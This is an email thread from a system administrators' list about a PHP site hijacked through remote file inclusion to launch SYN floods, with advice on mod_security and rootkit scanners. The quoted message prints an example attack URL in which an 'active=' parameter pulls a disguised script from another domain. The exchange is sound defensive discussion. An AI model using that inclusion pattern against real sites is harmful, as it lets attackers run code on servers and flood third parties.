Yep, a couple of times.
Looks like they have used a phpupload script to plant a file on your
server. All in then takes is a few infected PC's to target that file and
launch the flood.
Or in our case, loads of emails claiming to be from "voxcards.com.br"
We eventually installed mod_security onto our servers in order to
prevent a lot of this rubbish from occurring. (www.gotroot.com) - the
rules it uses are quite good at blocking the phpupload attempts,
although you will get some false positives.
Check your /tmp and /dev/shm for any other hidden surprises. If you have
chkrootkit or rkhunter installed, it might be a good idea to run that too.
Paul W
Diana Saunders wrote:
> I started a thread last week regarding trying to block some IPs that I
> thought were sending a syn flood on my server. The suggested action
> (IP Tables) didn't seem to help.
>
> It turns out the problem was a little different than I expected and I
> wanted to let everyone know exactly what was happening.
>
> What some was doing was running the following URLs on one of the
> server's sites:
>
> http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
>
>
> But filename.gif is not a gif, it is a text file with a script that
> sends a synflood to some other server.
>
> The ?sctive= part of the URL is the way the site was set up for
> navigation. Although I design in PHP a lot, I haven't run across this
> particular navigation set up. But in any event, it obviously opens
> the site to the kind of exploiting behavior it was getting. I'm
> assuming some design software set the navigation up this way and that
> once this is taken out there shouldn't be a problem.
>
> Has anyone else run across this?
>
>
>
>
--
This message has been scanned for viruses and
dangerous content by Swift Internet, and is
believed to be clean.